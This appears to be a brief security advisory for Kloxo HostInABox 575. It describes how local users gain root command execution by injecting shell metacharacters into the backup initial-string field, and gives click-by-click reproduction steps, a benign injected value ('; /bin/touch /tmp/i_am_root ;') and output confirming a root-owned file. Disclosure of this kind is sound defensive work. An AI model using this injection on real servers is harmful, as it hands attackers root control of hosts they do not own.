Kloxo HostInABox 575 - shell invocation, local command execution as root



DESCRIPTION


Local users can execute any command(s) of their choice as root via metacharacter injection in the backup initial string.



IMPACT


Local users can execute commands as root.

1. Log into Kloxo
2. Click "Backup Home"
3. In the box titled "Backup File Initial String", enter: ; /bin/touch /tmp/i_am_root ;
4. Click "Backup Now"

Observe:

[user1@testing574 user1]$ ls -l /tmp/i_am_root
-rw-r--r-- 1 root root 0 May 20 21:50 /tmp/i_am_root